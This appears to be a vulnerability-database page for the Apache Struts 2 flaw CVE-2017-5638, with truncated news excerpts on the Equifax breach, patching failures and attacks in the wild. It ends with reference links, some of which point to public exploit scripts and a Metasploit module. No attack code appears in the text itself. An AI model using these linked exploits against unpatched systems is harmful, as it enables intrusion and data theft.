Paulino do Rego Barros, Jr., the company’s interim CEO, announced Monday that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.
Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out furth...

Equifax couldn't find or patch vulnerable Struts implementations
The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Equifax was just as much of a trash-fire as it looked: the company saw the Apache Struts 2 vulnerability warning, failed to patch its systems, and held back a public announcement for weeks for fear of “copycat” attacks.
Those Infosec for Absolute Dummies tips were made official by ex-CEO Richard Smith, by way of evidence published by a US House committee ahead of his in-person appearance Tuesday.
Smith's written statement [PDF] to the House Committee on Energy and Commerce says t...

Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug
Threatpost • Chris Brook • 26 Sep 2017

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.
The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, earlier this month.
Scores of Oracle products, roughly two dozen in total, are aff...

Equifax's disastrous Struts patching blunder: THOUSANDS of other orgs did it too
The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

Thousands of companies may be susceptible to the same type of hack that recently struck Equifax.
The Equifax breach was the result of a vulnerable Apache Struts component. Software automation vendor Sonatype warns that 3,054 organisations downloaded the same Struts2 component exploited in the Equifax hack in the last 12 months. The affected version of Struts2 was publicly disclosed as vulnerable (CVE-2017-5638) on March 10, and was subsequently exploited at Equifax between May and late Jul...

Equifax's IT leaders 'retire' as company says it knew about the bug that brought it down
The Register • Simon Sharwood, APAC Editor • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.
The retirements and more details about the company's mega-breach are revealed in a new entry to equifaxsecurity2017.com in which the company describes what it knew, when it knew it, and how it responded.
The update reveals that the the attack hit the company's “U.S. o...

Equifax mega-breach: Security bod flags header config conflict
The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.
The finding from Helme comes as a date was confirmed for the Equifax CEO to appear before Congress earlier next month, and the FTC said it was investigating the credit reference agency.
“Many of the headers are more about addressing the basics, but as a site that...

Equifax Confirms March Struts Vulnerability Behind Breach
Threatpost • Chris Brook • 14 Sep 2017

Equifax said the culprit behind this summer’s massive breach of 143 million Americans was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.
The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman told Reuters on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.
On We...

Missed patch caused Equifax data breach
The Register • Simon Sharwood, APAC Editor • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

Equifax has revealed that the cause of its massive data breach was a flaw it should have patched weeks before it was attacked.
The company has updated its www.equifaxsecurity2017.com/ site with a new “A Progress Update for Consumers” that opens as follows:
As the Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017. Doubt us? Here's the NIST notification that mentions it as being notified on March 10th.
Equifax was breached in “mid-May...

Credit reference agencies faulted for poor patching
The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year.
The security shortcoming raises important questions following the disclosure of a mega-breach at Equifax last week that affected data on 143 million Americans and an as-yet unknown number of Canadians and Brits. Equifax only said that an unspecified web ...

Apache Foundation Refutes Involvement in Equifax Breach
Threatpost • Chris Brook • 11 Sep 2017

A group of developers behind Apache Struts, believed by some to be the culprit behind last week’s Equifax breach, took umbrage with those claims over the weekend.
René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any was exploited.
The letter, which was written on behalf of the Struts PMC, was spurred by an internal analyst report...

Patch Released for Critical Apache Struts Bug
Threatpost • Tom Spring • 05 Sep 2017

The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.
All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.
“This particular vulnerability allows a remote attacker t...

Attacks Heating Up Against Apache Struts 2 Vulnerability
Threatpost • Michael Mimoso • 09 Mar 2017

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was patched and proof-of-concept exploit code was introduced into Metasploit.
The vulnerability, CVE-2017-5638, was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.
“The second someone starts working on a Me...

Apache Struts 2 needs patching, without delay. It's under attack now
The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

Infosec researchers have found a “dire” zero-day in Apache Struts 2, and it's under active attack.
If you're a sysadmin using the Jakarta-based file upload Multipart parser under Apache Struts 2, Nick Biasini of Cisco's Talos advises applying the latest upgrade immediately.
CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site.
Talos's input adds urgency to getting the upgrade, because the organisation “found a high number of exploitation events. The ma...

References

CWE-20http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.htmlhttp://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txthttp://www.eweek.com/security/apache-struts-vulnerability-under-attack.htmlhttp://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.htmlhttp://www.securityfocus.com/bid/96729http://www.securitytracker.com/id/1037973https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/https://cwiki.apache.org/confluence/display/WW/S2-045https://cwiki.apache.org/confluence/display/WW/S2-046https://exploit-db.com/exploits/41570https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519ahttps://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228https://github.com/mazen160/struts-pwnhttps://github.com/rapid7/metasploit-framework/issues/8064https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_ushttps://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_ushttps://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_ushttps://isc.sans.edu/diary/22169https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.htmlhttps://packetstormsecurity.com/files/141494/S2-45-poc.py.txthttps://security.netapp.com/advisory/ntap-20170310-0001/https://struts.apache.org/docs/s2-045.htmlhttps://struts.apache.org/docs/s2-046.htmlhttps://support.lenovo.com/us/en/product_security/len-14200https://twitter.com/theog150/status/841146956135124993https://www.exploit-db.com/exploits/41614/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/https://www.kb.cert.org/vuls/id/834067https://www.symantec.com/security-center/network-protection-security-advisories/SA145https://www.rapid7.com/db/vulnerabilities/struts-cve-2017-5638https://tools.cisco.com/security/center/viewAlert.x?alertId=52972https://nvd.nist.govhttps://www.exploit-db.com/exploits/41570/https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognlhttps://www.kb.cert.org/vuls/id/834067